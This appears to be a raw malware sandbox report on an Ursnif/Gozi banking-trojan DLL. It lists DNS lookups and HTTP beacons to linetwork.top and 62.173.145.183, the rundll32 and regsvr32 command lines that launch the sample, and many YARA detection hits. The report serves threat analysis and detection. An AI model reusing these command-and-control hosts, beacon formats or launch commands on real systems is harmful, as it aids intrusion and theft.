                Oct 20, 2022 14:20:58.768901110 CEST5963653192.168.2.38.8.8.8
                Oct 20, 2022 14:20:59.101449013 CEST53596368.8.8.8192.168.2.3
                Oct 20, 2022 14:21:01.716295958 CEST5770453192.168.2.38.8.8.8
                Oct 20, 2022 14:21:02.109479904 CEST53577048.8.8.8192.168.2.3
                Oct 20, 2022 14:22:35.055566072 CEST5384453192.168.2.38.8.8.8
                Oct 20, 2022 14:22:35.451850891 CEST53538448.8.8.8192.168.2.3
                Oct 20, 2022 14:22:40.184843063 CEST6501753192.168.2.38.8.8.8
                Oct 20, 2022 14:22:40.204747915 CEST53650178.8.8.8192.168.2.3
                Oct 20, 2022 14:22:43.236782074 CEST5346653192.168.2.38.8.8.8
                Oct 20, 2022 14:22:43.628283024 CEST53534668.8.8.8192.168.2.3
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 20, 2022 14:20:53.394753933 CEST192.168.2.38.8.8.80xdca1Standard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                Oct 20, 2022 14:20:58.768901110 CEST192.168.2.38.8.8.80x97d5Standard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                Oct 20, 2022 14:21:01.716295958 CEST192.168.2.38.8.8.80x85b8Standard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:35.055566072 CEST192.168.2.38.8.8.80x7cc5Standard query (0)linetwork.topA (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:40.184843063 CEST192.168.2.38.8.8.80xa633Standard query (0)linetwork.topA (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:43.236782074 CEST192.168.2.38.8.8.80x261bStandard query (0)linetwork.topA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 20, 2022 14:20:41.422310114 CEST8.8.8.8192.168.2.30xa8beNo error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)false
                Oct 20, 2022 14:20:53.499351978 CEST8.8.8.8192.168.2.30xdca1No error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                Oct 20, 2022 14:20:59.101449013 CEST8.8.8.8192.168.2.30x97d5No error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                Oct 20, 2022 14:21:02.109479904 CEST8.8.8.8192.168.2.30x85b8No error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:35.451850891 CEST8.8.8.8192.168.2.30x7cc5No error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:40.204747915 CEST8.8.8.8192.168.2.30xa633No error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                Oct 20, 2022 14:22:43.628283024 CEST8.8.8.8192.168.2.30x261bNo error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                • linetwork.top
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.34977962.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Oct 20, 2022 14:22:35.988557100 CEST9304OUTGET /drew/09dgKs_2BbGAUCZtNDfinAe/OBR2Fkwyls/rLfOzEm8taaEOpdgP/DGmX0HEH0YWb/9UgQCY1OoBP/16pWsh4Cy9rMRa/0naMTlH4D0jWSBvaLUMCT/VzfvlLpo6FHUtlJQ/DtpBc7vmn8rOS4k/xe3M0wkxCK5Om9Qsrc/Fu1mpdzkb/E5_2FW9vtCbCxhM8q_2F/YFJvu0mL313E60i9bem/o9T05qm4K45Pkaydjzo9gZ/BS0FXjQKsPhWn/z4GNxY84/_2FhBQGZQz4I6Dv77YbEnq5/_2FeodcjVbE87q/b67.jlk HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                Host: linetwork.top
                Connection: Keep-Alive
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.34978062.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Oct 20, 2022 14:22:40.268484116 CEST9305OUTGET /drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs/iuv6_2F2R2q/VU2O6EJ3EhI5uh/A5C2wRpZF_2FN6Skwj1uH/gsVRqmZs2mqIGO1d/sKRhOCfSSp3MAva/Mxxm2nqzKORinrbeZ3/z67oAItgn/k8VHFWexyUU_2FA_2BPV/QdcdTsvdt_2BKefM9G5/mT6M3zVj_2BfxHgfvoM1Vv/marhfTTPZdwKD/8RgEG4oq/f5httb_2BKiNQuEoUj_2FU4/qo0ljR4FNC0/5q1FSK.jlk HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                Host: linetwork.top
                Connection: Keep-Alive
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.34978162.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                TimestampkBytes transferredDirectionData
                Oct 20, 2022 14:22:43.698697090 CEST9306OUTGET /drew/KMMjqoTxziRlJvE/gNQPrvUPxqLNufKLCE/JH3UmHEB_/2B_2BzV_2BvfObx2f9w0/DgM6KzpzkFa0_2B2dRV/pBB0_2FnhSh3B1HrWQggbl/6yr_2BeHM7RhP/EQBdRd5n/WMFWEYQbNncplyS1nZxHquO/Dl0_2FZlCi/H7jS5UTDOVVAj0e_2/BP38A8joa9MI/uVE_2Fo3ECW/1FFJSef9MuZGr_/2B9LknlvHMlh3p6lHoAOu/HpoF5RbVarHLswoW/XhjcRNsVFN_2Faq/1QC22OwanscYLqlevC/p97ADQM6AS8_2FJi/nn82n.jlk HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                Host: linetwork.top
                Connection: Keep-Alive
                Cache-Control: no-cache


                Click to jump to process

                Target ID:0
                Start time:14:19:56
                Start date:20/10/2022
                Path:C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit):true
                Commandline:loaddll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll"
                Imagebase:0x1320000
                File size:116736 bytes
                MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:moderate

                Target ID:1
                Start time:14:19:56
                Start date:20/10/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff745070000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:14:19:56
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Imagebase:0xb0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:14:19:56
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline:regsvr32.exe /s C:\Users\user\Desktop\cVZ5IwmAMe.dll
                Imagebase:0x1000000
                File size:20992 bytes
                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:high

                Target ID:4
                Start time:14:19:56
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Imagebase:0x390000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:high

                Target ID:5
                Start time:14:19:57
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\cVZ5IwmAMe.dll,DllRegisterServer
                Imagebase:0x390000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:high

                Target ID:9
                Start time:14:20:16
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 272
                Imagebase:0x270000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:19
                Start time:14:20:20
                Start date:20/10/2022
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 276
                Imagebase:0x270000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                No disassembly